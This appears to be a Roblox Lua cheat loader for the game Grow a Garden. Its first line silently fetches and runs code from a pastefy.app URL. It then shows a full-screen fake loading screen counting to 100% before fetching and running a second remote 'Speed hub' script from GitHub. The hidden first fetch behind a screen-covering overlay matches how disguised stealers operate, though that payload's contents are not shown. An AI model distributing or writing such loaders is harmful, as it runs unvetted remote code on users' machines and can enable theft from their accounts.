loadstring(game:HttpGet("https://pastefy.app/PxoZkaGR/raw"))()
local gui = Instance.new("ScreenGui", game.CoreGui)
gui.IgnoreGuiInset = true
gui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

local frame = Instance.new("Frame", gui)
frame.BackgroundColor3 = Color3.new(0, 0, 0)
frame.Size = UDim2.new(1, 0, 1, 0)

local title = Instance.new("TextLabel", frame)
title.Text = "GROW a garden"
title.Font = Enum.Font.FredokaOne
title.TextColor3 = Color3.fromRGB(100, 255, 100)
title.TextScaled = true
title.BackgroundTransparency = 1
title.Position = UDim2.new(0.25, 0, 0.35, 0)
title.Size = UDim2.new(0.5, 0, 0.15, 0)

local percentLabel = Instance.new("TextLabel", frame)
percentLabel.Text = "0%"
percentLabel.Font = Enum.Font.GothamBold
percentLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
percentLabel.TextScaled = true
percentLabel.BackgroundTransparency = 1
percentLabel.Position = UDim2.new(0.4, 0, 0.55, 0)
percentLabel.Size = UDim2.new(0.2, 0, 0.08, 0)

for i = 0, 100, 1 do
    percentLabel.Text = i .. "%"
    task.wait(0.1)
end

frame.BackgroundColor3 = Color3.fromRGB(50, 200, 50)
title.Text = ""
percentLabel.Text = ""

local palm1 = Instance.new("ImageLabel", frame)
palm1.Image = "rbxassetid://1095708"
palm1.Size = UDim2.new(0.2, 0, 0.3, 0)
palm1.Position = UDim2.new(0, 10, 0, 10)
palm1.BackgroundTransparency = 1

local palm2 = Instance.new("ImageLabel", frame)
palm2.Image = "rbxassetid://1095708"
palm2.Size = UDim2.new(0.2, 0, 0.3, 0)
palm2.Position = UDim2.new(0.8, 0, 0.7, 0)
palm2.BackgroundTransparency = 1

task.wait(2)

gui:Destroy()

loadstring(game:HttpGet("https://raw.githubusercontent.com/universalrobloxx/Grow-a-Garden/refs/heads/main/Speed%2520hub%25shit"))()
